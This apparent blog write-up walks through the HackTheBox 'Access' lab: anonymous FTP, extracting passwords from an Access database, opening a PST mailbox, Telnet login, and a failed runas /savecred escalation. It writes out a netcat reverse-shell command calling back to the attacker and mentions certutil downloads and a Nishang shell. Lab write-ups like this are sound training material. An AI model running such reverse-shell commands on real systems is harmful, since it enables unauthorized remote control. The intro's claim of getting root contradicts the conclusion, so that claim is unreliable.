Windows Privilege Escalation Through Runas | HackTheBox Access | CREST CRT Track
HackTheBox Access was a simple Windows box, which is great to have around because it can be difficult to identify places for new Windows users. And it didn’t use SMB, unlike other Windows boxes. We’ll begin by requesting a zip file and an Access database via anonymous FTP access. We’ll utilize command line tools to search the database for a zip file-compatible password before opening the file to discover an Outlook mail file. We’ll read the email to find the account password on the box, then use telnet to connect. From there, We’ll access root.txt in two separate methods by using cached administrator credentials.
1. Initial Scan
I kicked things off with an Nmap scan (nmap -A <IP_address>
) to see what services were running. This revealed three open ports:
- Port 21 (FTP): This allowed anonymous access.
- Port 23 (Telnet): A potential login point.
- Port 80 (HTTP): A simple webpage with no obvious exploitable vulnerabilities.
2. FTP Exploration
I logged into the FTP server anonymously. It was crucial to enable binary mode (binary
) to ensure files downloaded correctly. I found two directories: backups
and engineer
. From backups
, I downloaded a database file named backup.mdb
. From engineer
, I downloaded a zip file.
3. Database Analysis (MDB File)
Instead of using Microsoft Access, I opted for a Linux tool called mdb-tables
(mdb-tables backup.mdb
) to list the tables within the database. I quickly identified a promising table named authentication_user
. To query this table, I used mdb-sql
(mdb-sql backup.mdb
).
- First, I tried to get the usernames:
select username from authentication_user; go
. This revealed users:admin
,engineer
, andbackup_admin
. - Then, I tried to get the passwords:
select password from authentication_user; go
. This gave me the passwords:admin
,access_for_you
,@security
, andadmin
. The password for theengineer
user wasaccess_for_you
.
4. Zip File Analysis
I attempted to unzip the zip file with unzip
, but it didn’t prompt for a password and didn’t extract any contents. I then used 7z e <zip_file_name>
, which did prompt for a password. The password @security
(which I found from the database) successfully extracted the contents, revealing a .pst
file (an Outlook data file).
5. PST File Analysis
To read the .pst
file without Outlook, I used the readpst
tool. This extracted the mailboxes. I then used cat <mailbox_file_name>
to view the contents of an email. The email, sent to security@accesscontrolsystem.com
, revealed a new password for the “security” account: access_for_you
.
6. Telnet Access
I used the credentials found in the email (username: security
, password: access_for_you
) to log in via Telnet (telnet <IP_address>
). Unfortunately, the shell was extremely unstable and slow, which foreshadowed later difficulties.
7. Privilege Escalation Attempt (and Frustration!)
I navigated to the Public\Desktop
directory and found a link file (.lnk
). I used the type <link_file_name>
command to view its contents. The link file contained a runas
command: runas /user:administrator /savecred <command>
. The /savecred
option implied it should run the command as administrator without asking for a password, assuming the administrator account was set up for this.
My goal was to use runas
to get a reverse shell as administrator. I first downloaded netcat
to the target machine using certutil
. I tried various runas
commands to execute netcat
and connect back to my machine, for example:
runas /user:administrator /savecred "c:\path\to\nc.exe <my_IP> <port> -e cmd.exe"
- I also tried specifying the full path to
runas.exe
(c:\windows\system32\runas.exe
).
To get a more stable shell, I even attempted to use a Nishang PowerShell reverse shell to connect back to my machine.
Regrettably, none of the runas
commands worked. The shell was simply too buggy, and the runas
command itself didn’t seem to be functioning correctly on this particular machine. Even running runas
by itself didn’t produce any output.
Conclusion
Due to the extreme instability and issues with the runas
command, I wasn’t able to get the root flag in this session. It’s a common frustration with some retired Hack The Box machines – they can be quite buggy! I encourage you to try it yourself, and if you find a way that works, please share it in the comments!